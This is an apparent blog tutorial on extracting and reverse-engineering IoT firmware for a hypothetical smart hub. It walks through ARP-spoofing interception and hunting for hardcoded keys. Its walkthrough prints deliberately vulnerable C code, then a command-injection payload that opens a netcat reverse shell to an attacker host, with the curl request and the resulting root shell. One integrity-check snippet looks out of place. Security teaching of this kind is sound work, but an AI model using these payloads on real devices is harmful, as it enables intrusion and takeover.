Picoable

Posted on Nov 11 • Originally published at hacking.picoable.com

A Practical Guide to Extracting and Analyzing IoT Firmware

#firmware #reverseengineering #hacking #security

Introduction

The Internet of Things (IoT) has woven itself into the fabric of our daily lives, from smart home hubs and security cameras to industrial control systems. While these devices offer incredible convenience, they also represent a vast and often-vulnerable attack surface. Each device runs on firmware—the low-level software that controls its hardware. For a security researcher or bug bounty hunter, this firmware is a treasure map leading to potential vulnerabilities.

This guide provides a practical walkthrough of the firmware analysis process. Our goal is to demystify IoT hacking, transforming it from a perceived dark art into a systematic methodology. We'll cover extracting firmware, performing static and dynamic analysis, and identifying and exploiting a common vulnerability.

For our example, we'll target a hypothetical "AI-Powered Smart Hub." This device claims to personalize user experiences by learning from user behavior, implying complex on-device logic and cloud communication—a rich environment for security flaws.

Phase 1: Firmware Extraction

Before we can analyze anything, we need the firmware itself. This is often the first and most challenging hurdle. Here are the primary methods for getting your hands on the binary.

Physical Methods

If you have physical access to the device, you can often extract the firmware directly from the memory chip.

JTAG/SWD Interfaces: Many devices have exposed debugging ports like JTAG (Joint Test Action Group) or SWD (Serial Wire Debug) on their Printed Circuit Board (PCB). These ports provide low-level access to the CPU and memory.
- Tools: J-Link, OpenOCD, Bus Pirate.
- Process: Identify the JTAG/SWD pins (TDI, TDO, TCK, TMS, and sometimes TRST) on the PCB, connect your adapter, and use a debugger like GDB to halt the processor and dump the memory contents.
Direct Flash Memory Dumping: The firmware is typically stored in a NOR or NAND flash chip.
- Tools: Logic analyzer (e.g., Saleae), chip programmer (e.g., CH341A), hot-air rework station.
- Process: Solder wires to the chip's pins while it's on the board (in-system programming) or, for a cleaner read, desolder the chip entirely. Connect it to a programmer and read its contents directly. This bypasses any software-level security.

Remote Methods

If you can't open the device, you can often capture the firmware as it travels over the network.

OTA (Over-the-Air) Updates: Most IoT devices update themselves by downloading firmware from a vendor's server.
- Tools: mitmproxy, Wireshark.
- Process: Position yourself as a man-in-the-middle (e.g., using ARP spoofing) and intercept the device's network traffic. When an update is initiated, you can capture the HTTP/HTTPS request and download the firmware file yourself. These files are often encrypted, but sometimes they are not.
Exposed Services & Backdoors: Poorly configured devices might expose services that let you download the firmware.
- Tools: nmap, an FTP client, a web browser.
- Process: Scan the device for open ports. You might find an unprotected FTP server, an unauthenticated web endpoint, or even a TFTP server hosting the firmware image for recovery purposes.

Phase 2: Static Analysis - Taking the Firmware Apart

Once you have the firmware file (e.g., firmware.bin), it's time to dissect it without running it.

Initial Triage with `binwalk`

binwalk is an indispensable tool for analyzing binary blobs. It scans for signatures of different file types, filesystems, and executable code.

# Scan the firmware for known file types and decompress/extract them
binwalk -eM firmware.bin

This command might reveal and extract a complete Linux filesystem, such as SquashFS or CramFS. Suddenly, you have the device's entire root directory, ready for inspection.

Analyzing the Filesystem

With the filesystem extracted, you can start hunting for sensitive information:

Hardcoded Secrets: Look for API keys, passwords, and private certificates. A simple grep can be surprisingly effective.
```
# Search for anything that looks like an AWS access key
grep -r "AKIA" /path/to/extracted/filesystem/
```
Scripts and Configuration: Examine shell scripts (.sh) and Python scripts (.py) for logic flaws. A tool like bandit can automatically find dangerous patterns in Python code, such as the use of os.system or exec.
Binaries: The core application logic usually resides in compiled binaries in /usr/bin or /sbin. These are your primary targets for reverse engineering.

Reverse Engineering Binaries with Ghidra

Ghidra is a free, powerful software reverse engineering suite developed by the NSA.

Load the Binary: Import your target binary (e.g., the main /usr/sbin/smarthub_server) into a new Ghidra project. Ghidra will automatically analyze it, identifying functions and cross-references.
Find Interesting Functions: A great way to start is by searching for interesting strings in the "Defined Strings" window. Look for terms like "password," "secret," "API_KEY," http://, or error messages. Right-click a string and find its cross-references to see where in the code it's used.
Analyze Logic: Ghidra's decompiler will show you a C-like representation of the assembly code, making it much easier to understand.
- Look for Weak Cryptography: Are they rolling their own encryption? Is there a custom integrity check? For example, you might find code that hashes parts of the firmware to verify its integrity, similar to this:
```
  # Example of a firmware integrity check
  sha256 = hashlib.sha256()
  for tensor in reader.tensors:
      # ... skip some tensors ...
      sha256.update(tensor.data.data)
  # The final hash is then compared against a known value
```
Understanding this routine is key to patching the binary and recalculating the hash to bypass the check.
- Identify Dangerous Functions: Pay close attention to calls to C functions known to be unsafe, like strcpy, sprintf, gets, and system. These are classic sources of buffer overflows and command injection vulnerabilities.

Phase 3: Dynamic Analysis - Poking the Live System

Static analysis tells you what the code can do. Dynamic analysis tells you what it actually does when it runs.

Environment Setup

Network Interception: The easiest way to analyze network traffic is to force the IoT device to route its traffic through your analysis machine. Set up your machine as a Wi-Fi hotspot and run mitmproxy or Wireshark.
Emulation: For ARM or MIPS binaries, you can often run them directly on your x86 machine using QEMU's user-space emulation (qemu-arm-static). This lets you run and debug the binary without needing the physical device.

Analyzing Network Traffic

With mitmproxy running, you can see all HTTP/HTTPS requests the device makes. This can reveal:

Undocumented cloud APIs.
Unencrypted data transmissions containing sensitive information like usernames or location data.
Real-time communication protocols like WebSockets or MQTT.

For example, you might discover the device uses a WebSocket for real-time status updates. The intercepted communication could look like this, revealing the protocol's structure:

CLIENT -> SERVER: {"event": "subscribe_to_research", "data": {"research_id": "user_activity_model"}}
SERVER -> CLIENT: {"event": "research_progress_user_activity_model", "data": {"progress": 10, "message": "Analyzing data..."}}

This gives you a blueprint to start fuzzing the endpoint. What happens if you send a non-existent research_id? Or a 10,000-character string? Or a SQL injection payload?

Vulnerability Walkthrough: Unauthenticated Command Injection

Let's tie it all together with a concrete example.

Static Discovery: While analyzing the smarthub_server binary in Ghidra, we find a function that handles fetching content from a URL provided by the user (e.g., to set a custom dashboard background). The decompiled C code looks worryingly like this:
```
void fetch_background(char *user_url) {
  char command[256];
  // DANGER: user_url is not sanitized!
  sprintf(command, "curl -o /tmp/background.jpg '%s'", user_url);
  system(command);
}
```
The code uses sprintf to construct a shell command with unsanitized user input and then executes it with system. This is a textbook command injection vulnerability.
Dynamic Confirmation: We use our mitmproxy setup to find the API endpoint that triggers this function. We see a POST request to /api/set_dashboard_background with a JSON body: {"url": "http://example.com/image.jpg"}.
Exploitation: We can now craft a malicious payload. We'll use Burp Suite Repeater or a simple curl command to send a crafted URL that breaks out of the original command and executes our own. Our payload will start a reverse shell back to our machine.

The payload: ';/bin/busybox nc 192.168.1.100 4444 -e /bin/sh;'

*   The first `'` closes the string for the `curl` command.
*   The `;` separates shell commands.
*   We then run `nc` (netcat) to connect back to our attacker machine (`192.168.1.100` on port `4444`) and execute a shell (`-e /bin/sh`).
*   The final `;` ensures any trailing characters from the original command are treated as a separate, likely-to-fail command.

Getting the Shell:
- On our attacker machine, we start a listener:
```
  nc -lvp 4444
```

*   We send the malicious request to the device:

  ```bash
  curl -X POST http://192.168.1.50/api/set_dashboard_background \
  -H "Content-Type: application/json" \
  -d '{"url": "';/bin/busybox nc 192.168.1.100 4444 -e /bin/sh;'"}'
  ```

*   Our listener catches the incoming connection, and we have a root shell on the device.

  ```
  listening on [any] 4444 ...
  connect to [192.168.1.100] from (UNKNOWN) [192.168.1.50] 48172
  # whoami
  root
  ```

  Game over.

Mitigation and Conclusion

Mitigation

The discovered vulnerability could be patched by adhering to secure coding principles:

Avoid system(): Never build shell commands with user-supplied data. Use library functions that don't invoke a shell, such as libcurl for making HTTP requests in C.
Input Validation: Strictly validate all user input. For a URL, ensure it conforms to the HTTP/HTTPS schema and doesn't contain shell metacharacters.
Principle of Least Privilege: The web server process should not run as root. A dedicated, unprivileged user would limit an attacker's capabilities even if they achieve code execution.

Conclusion

Analyzing IoT firmware is a methodical process of peeling back layers. We started by physically or remotely acquiring the code, then used static analysis tools like binwalk and Ghidra to understand its structure and logic. Finally, we used dynamic analysis with mitmproxy to observe its real-world behavior, leading us to a critical vulnerability.

The world of IoT security is vast and growing. By mastering this cycle of extraction, static analysis, and dynamic analysis, you can effectively audit these devices, uncover significant vulnerabilities, and contribute to a more secure connected world. Hacking isn't magic; it's a systematic process of understanding a system so deeply that you can make it do things it was never designed to do.

DEV Community

A Practical Guide to Extracting and Analyzing IoT Firmware

Introduction

Phase 1: Firmware Extraction

Physical Methods

Remote Methods

Phase 2: Static Analysis - Taking the Firmware Apart

Initial Triage with `binwalk`

Analyzing the Filesystem

Reverse Engineering Binaries with Ghidra

Phase 3: Dynamic Analysis - Poking the Live System

Environment Setup

Analyzing Network Traffic

Vulnerability Walkthrough: Unauthenticated Command Injection

Mitigation and Conclusion

Mitigation

Conclusion

Top comments (0)

Introduction

Phase 1: Firmware Extraction

Physical Methods

Remote Methods

Phase 2: Static Analysis - Taking the Firmware Apart

Initial Triage with binwalk

Analyzing the Filesystem

Reverse Engineering Binaries with Ghidra

Phase 3: Dynamic Analysis - Poking the Live System

Environment Setup

Analyzing Network Traffic

Vulnerability Walkthrough: Unauthenticated Command Injection

Mitigation and Conclusion

Mitigation

Conclusion

Initial Triage with `binwalk`